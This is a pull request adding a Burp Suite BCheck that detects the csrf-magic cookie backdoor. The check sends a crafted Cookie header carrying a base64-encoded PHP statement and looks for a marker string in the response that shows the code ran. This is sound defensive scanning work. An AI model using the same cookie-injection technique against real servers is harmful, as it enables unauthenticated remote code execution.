### PR TITLE
Add bcheck for csrf-magic backdoor

### DIFF
--- a/other/csrf_magic_backdoor.bcheck
+++ b/other/csrf_magic_backdoor.bcheck
@@ -1,0 +1,27 @@
+metadata:
+    language: v2-beta
+    name: "CSRF-Magic backdoor detected"
+    description: "Tests if code for the CSRF-Magic backdoor is triggered. "
+    author: "MOGWAI LABS GmbH"
+
+given path then
+    send request called check:
+        method: "GET"
+        replacing headers:
+            "Cookie": "a=ab;b=;c=ZWNobyAiY3NyZi1tYWdpYyI7Ly8=;d=;"
+
+    if "<c123>csrf-magic</c123>" in {check.response.body} then
+        report issue:
+            severity: high
+            confidence: firm
+            detail: `CSRF-Magic cookie backdoor was discovered.
+
+This backdoor was present in old versions of the CSRF-magic library
+and allows an unauthenticated attacker to evaluate arbitrary PHP code by setting malicious cookies.
+
+* The vulnerable code can be found here: https://web.archive.org/web/20220325023755/https://github.com/csrf-magic/csrf-magic/blob/master/csrf-magic.php
+* A writeup for the vulnerabilty can be found here: https://www.labs.greynoise.io/grimoire/2024-02-what-is-this-old-ivanti-exploit/index.html
+* A real-world example where this backdoor was expliotable: https://forums.ivanti.com/s/article/SA-2021-12-02?language=en_US
+`
+            remediation: "Ensure you remove the backdoored code from the csrf-magic.php file and investigate the server for indicators of compromise."
+    end if


### PR DESCRIPTION
BCheck to detect a csrf-magic backdoor.

References:
* [The backdoor code](https://web.archive.org/web/20220325023755/https://github.com/csrf-magic/csrf-magic/blob/master/csrf-magic.php)
* [Exploit Writeupe](https://www.labs.greynoise.io/grimoire/2024-02-what-is-this-old-ivanti-exploit/index.html)
* [Real-world CVE due to the backdoor](https://forums.ivanti.com/s/article/SA-2021-12-02?language=en_US)

### BCheck Contributions

* [x] BCheck compiles and executes as expected
* [x] BCheck contains appropriate metadata (name, version, author, description and appropriate tags)
* [x] Only .bcheck files have been added or modified
* [x] BCheck is in the appropriate folder
* [x] PR contains single or limited number of BChecks (Multiple PRs are preferred)
* [x] BCheck attempts to minimize false positives

Example output for finding:

**Overview**

<img width="1252" alt="image" src="https://github.com/PortSwigger/BChecks/assets/18122064/664c99b0-0ae5-46a0-97fb-23058769e1e9">

**Request**

<img width="1226" alt="image" src="https://github.com/PortSwigger/BChecks/assets/18122064/263e32ca-480c-41f8-8aba-01491f39d98d">

**Response**

<img width="769" alt="image" src="https://github.com/PortSwigger/BChecks/assets/18122064/4583c824-5a11-4591-8192-ff61de84b90f">


